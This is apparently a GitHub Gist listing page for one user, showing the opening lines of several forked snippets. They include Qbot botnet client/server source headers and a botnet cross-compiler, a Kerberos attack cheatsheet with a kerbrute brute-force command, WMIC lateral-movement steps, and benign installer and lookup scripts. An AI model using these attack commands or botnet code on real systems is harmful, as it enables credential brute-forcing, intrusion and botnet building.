Skip to content

Instantly share code, notes, and snippets.

@reanimat0r
reanimat0r / client.c
Created June 19, 2020 20:52 — forked from chaztaz11/client.c
Qbot Files
#define PR_SET_NAME 15
#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
#define PAD_RIGHT 1
#define PAD_ZERO 2
#define PRINT_BUF_LEN 12
#define CMD_IAC 255
#define CMD_WILL 251
#define CMD_WONT 252
#define CMD_DO 253
#define CMD_DONT 254
@reanimat0r
reanimat0r / cc7.py
Created June 19, 2020 20:41 — forked from chaztaz11/cc7.py
file
#Python auto cross compiler by void
import subprocess, sys
if len(sys.argv[2]) != 0:
ip = sys.argv[2]
else:
print("\x1b[0;31mIncorrect Usage!")
print("\x1b[0;32mUsage: python " + sys.argv[0] + " <BOTNAME.C> <IPADDR> \x1b[0m")
exit(1)
@reanimat0r
reanimat0r / server.c
Created June 19, 2020 20:31 — forked from chaztaz11/server.c
File
/*
███╗ ███╗ ██████╗ ██████╗ ███████╗
████╗ ████║██╔═══██╗██╔══██╗╚══███╔╝
██╔████╔██║██║ ██║██║ ██║ ███╔╝
██║╚██╔╝██║██║ ██║██║ ██║ ███╔╝
██║ ╚═╝ ██║╚██████╔╝██████╔╝███████╗
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝
If you have this you are trusted. Please do not leak!
MODZ SERVER SIDE V1 By DaddyL33T
# /------------------------------------------\
# | don't forget to download the .tp file |
# | and place it in the user's directory :› |
# | |
# | also install lolcat: |
# | https://github.com/busyloop/lolcat |
# \------------------------------------------/
alias test-passed='if [ "$?" -eq "0" ]; then lolcat ~/.tp -a -s 40 -d 2; fi;'
@reanimat0r
reanimat0r / 0_opencti_ubuntu_installer.sh
Created May 17, 2020 17:08 — forked from p-rs/0_ubuntu_opencti_installer.sh
Automates install OpenCTI based on manual deployment: https://opencti-platform.github.io/docs/installation/manual - Tested successfully on Ubuntu 18.04
#! /bin/bash -e
# script: opencti_ubuntu_installer.sh
# purpose: to automate install opencti based on manual deployment below
# process: https://opencti-platform.github.io/docs/installation/manual
# license: Apache 2.0
# check root -------------------------------------------------------
@reanimat0r
reanimat0r / geoip2lookup.bash
Created May 10, 2020 09:51 — forked from bmatthewshea/geoip2lookup.bash
BASH GeoIP Lookup script for use with new Maxmind MMDB database files
#!/bin/bash
#
# By: Brady Shea - 10FEB2020
#
# Usage (ip4 only):
# geoip2lookup IP_ADDRESS
#
# ** Install GeoIP Tool and Updater **
#
# sudo add-apt-repository ppa:maxmind/ppa
@reanimat0r
reanimat0r / AbirDomains.py
Created April 23, 2020 21:21 — forked from ChananelCode/AbirDomains.py
Small very light-weight Subdomains checker .
# This code was written by Chananel Gerstensang.Contact: [email protected],
# Linkedin: https://www.linkedin.com/in/chananel-gerstensang-21a31b157
# Github: https://github.com/ChananelCode
# Enjoy!
import requests
counter_Domains = 0
Domains_List = open("./DomainsList.txt", "r").read().split()
@reanimat0r
reanimat0r / kerberos_attacks_cheatsheet.md
Created April 8, 2020 21:24 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@reanimat0r
reanimat0r / kerberos_attacks_cheatsheet.md
Created April 8, 2020 21:24 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@reanimat0r
reanimat0r / wmicLateralMovement.txt
Created April 8, 2020 21:12 — forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line to form one large block.
Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName